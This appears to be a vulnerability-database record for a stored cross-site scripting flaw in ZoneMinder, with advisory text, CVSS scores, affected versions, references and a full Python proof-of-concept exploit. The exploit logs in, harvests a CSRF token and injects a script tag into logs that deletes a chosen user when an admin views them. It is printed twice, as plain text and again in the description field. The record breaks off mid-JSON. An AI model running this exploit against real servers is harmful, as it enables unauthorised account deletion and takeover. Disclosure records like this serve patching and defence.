VAR-202210-0307

Vulnerability from variot - Updated: 2025-01-30 21:28

ZoneMinder is a free, open source closed-circuit television software application. The file parameter is vulnerable to a cross-site scripting vulnerability (XSS) by backing out of the current "tr" "td" brackets. This then allows a malicious user to provide code that will execute when a user views the specific log on the "view=log" page. This vulnerability allows an attacker to store code within the logs that will be executed when loaded by a legitimate user. These actions will be performed with the permission of the victim. This could lead to data loss and/or further exploitation including account takeover. This issue has been addressed in versions 1.36.27 and 1.37.24. Users are advised to upgrade. Users unable to upgrade should disable database logging. A cross-site scripting vulnerability exists in ZoneMinder. Information may be obtained and information may be tampered with.

Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS)

Date: 10/01/2022

Exploit Author: Trenches of IT

Vendor Homepage: https://github.com/ZoneMinder/zoneminder

Version: v1.36.26

Tested on: Linux/Windows

CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291

Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/

Proof of Concept:

1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)

2 - Admin user logs navigates to http://<target>/zm/index.php?view=log

3 - XSS executes delete function on target UID (user).

import requests
import re
import time
import argparse
import sys

def getOptions(args=sys.argv[1:]):
    parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1")
    parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True)
    parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True)
    parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True)
    parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True)
    parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True)
    options = parser.parse_args(args)
    return options

options = getOptions(sys.argv[1:])

payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F<script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'"

#Request to login and get the response headers
loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password
loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"}
loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"}
response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)
zmHeaders = response.headers
try:
    zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders))
    finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';')
except:
    print("[ERROR] Ensure the provided username and password is correct.")
    sys.exit(1)
print("Collected the low privilege user session token: "+finalSession)

#Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter"
csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'}
csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"}
response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)
zmBody = response.text
extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody))
finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '')
print("Collected the CSRF key for the log injection request: "+finalCsrfKey)
print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")

while True:

    #XSS Request
    xssUrl = "http://"+options.ip+"/zm/index.php"
    xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
    xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
    xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
    response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
    print("Injecting payload: " + response.text)

    time.sleep(1)


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202210-0307",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "zoneminder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "zoneminder",
        "version": "1.36.27"
      },
      {
        "model": "zoneminder",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "zoneminder",
        "version": "1.37.24"
      },
      {
        "model": "zoneminder",
        "scope": "gt",
        "trust": 1.0,
        "vendor": "zoneminder",
        "version": "1.37.0"
      },
      {
        "model": "zoneminder",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "zoneminder",
        "version": null
      },
      {
        "model": "zoneminder",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "zoneminder",
        "version": "1.37.0  greater than  1.37.24"
      },
      {
        "model": "zoneminder",
        "scope": null,
        "trust": 0.8,
        "vendor": "zoneminder",
        "version": null
      },
      {
        "model": "zoneminder",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "zoneminder",
        "version": "1.36.27"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-39285"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Trenches Of IT",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "171498"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2022-39285",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.3,
            "id": "CVE-2022-39285",
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security-advisories@github.com",
            "availabilityImpact": "HIGH",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.1,
            "id": "CVE-2022-39285",
            "impactScore": 5.5,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.4,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2022-39285",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "Low",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2022-39285",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "security-advisories@github.com",
            "id": "CVE-2022-39285",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2022-39285",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202210-333",
            "trust": 0.6,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-39285"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-39285"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ZoneMinder is a free, open source Closed-circuit television software application The file parameter is vulnerable to a cross site scripting vulnerability (XSS) by backing out of the current \"tr\" \"td\" brackets. This then allows a malicious user to provide code that will execute when a user views the specific log on the \"view=log\" page. This vulnerability allows an attacker to store code within the logs that will be executed when loaded by a legitimate user. These actions will be performed with the permission of the victim. This could lead to data loss and/or further exploitation including account takeover. This issue has been addressed in versions `1.36.27` and `1.37.24`. Users are advised to upgrade. Users unable to upgrade should disable database logging. ZoneMinder Exists in a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). 
\n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n    parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n    parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n    parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. (Example: -p 80\", required=True)\n    parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n    parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n    parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. 
(Example: -d 7\", required=True)\n    options = parser.parse_args(args)\n    return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n    zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n    finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, 
\u0027\u0027).strip(\u0027;\u0027)\nexcept:\n    print(\"[ERROR] Ensure the provided username and password is correct.\")\n    sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: 
http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n    \n    #XSS Request\n    xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n    xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n    xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n    xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n    response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n    print(\"Injecting payload: \" + response.text)\n\n    time.sleep(1)\n            \n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-39285"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "db": "PACKETSTORM",
        "id": "171498"
      }
    ],
    "trust": 1.71
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-39285",
        "trust": 3.4
      },
      {
        "db": "PACKETSTORM",
        "id": "171498",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202210-333",
        "trust": 0.6
      },
      {
        "db": "OTHER",
        "id": "NONE",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "db": "PACKETSTORM",
        "id": "171498"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-39285"
      }
    ]
  },
  "id": "VAR-202210-0307",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "OTHER",
        "id": null
      }
    ],
    "trust": 0.01
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "camera device"
        ],
        "sub_category": "camera",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      }
    ]
  },
  "last_update_date": "2025-01-30T21:28:02.358000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ZoneMinder Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=209972"
      }
    ],
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.0
      },
      {
        "problemtype": "Cross-site scripting (CWE-79) [ others ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-39285"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
      },
      {
        "trust": 2.4,
        "url": "https://github.com/zoneminder/zoneminder/commit/c0a4c05e84eea0f6ccf7169c014efe5422c9ba0d"
      },
      {
        "trust": 2.4,
        "url": "https://github.com/zoneminder/zoneminder/commit/d289eb48601a76e34feea3c1683955337b1fae59"
      },
      {
        "trust": 2.4,
        "url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-h6xp-cvwv-q433"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-39285/"
      },
      {
        "trust": 0.1,
        "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
      },
      {
        "trust": 0.1,
        "url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
      },
      {
        "trust": 0.1,
        "url": "http://\"+options.ip+\"/zm/index.php\""
      },
      {
        "trust": 0.1,
        "url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
      },
      {
        "trust": 0.1,
        "url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
      },
      {
        "trust": 0.1,
        "url": "http://\"+options.ip+\"/zm/index.php?view=login\","
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/zoneminder/zoneminder"
      },
      {
        "trust": 0.1,
        "url": "http://\""
      },
      {
        "trust": 0.1,
        "url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
      },
      {
        "trust": 0.1,
        "url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
      },
      {
        "trust": 0.1,
        "url": "http://\"+options.ip,"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
      },
      {
        "trust": 0.1,
        "url": "http://\u003ctarget\u003e/zm/index.php?view=log"
      }
    ],
    "sources": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "db": "PACKETSTORM",
        "id": "171498"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-39285"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "OTHER",
        "id": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "db": "PACKETSTORM",
        "id": "171498"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-39285"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-10-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-018651"
      },
      {
        "date": "2023-03-27T14:54:04",
        "db": "PACKETSTORM",
        "id": "171498"
      },
      {
        "date": "2022-10-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202210-333"
      },
      {
        "date": "2022-10-07T21:15:11.397000",
